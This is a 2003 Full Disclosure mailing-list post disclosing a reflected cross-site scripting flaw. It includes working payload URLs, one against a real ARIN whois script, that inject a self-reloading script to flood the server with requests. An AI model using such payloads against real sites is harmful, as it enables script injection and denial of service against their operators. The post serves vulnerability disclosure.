Full Disclosure mailing list archives
client attacks server - XSS
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Tue, 14 Oct 2003 11:05:04 +0530
huh, is this normal? muhaaa-hehe!!! this... http://host/stupidscript?someoption=<script>javascript:location.reload()</script> effectivly causes the client, to repeatedly reload the page, sending never ending requests to the server, some sites can do funny stuffts like this... http://ws.arin.net/cgi-bin/whois.pl?queryinput=<script>javascript:location.reload()</script> give it a minute... Oct 12, 2003 Donnie Werner morning_wood () exploitlabs com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- client attacks server - XSS morning_wood (Oct 13)
- Re: client attacks server - XSS Peter Moody (Oct 14)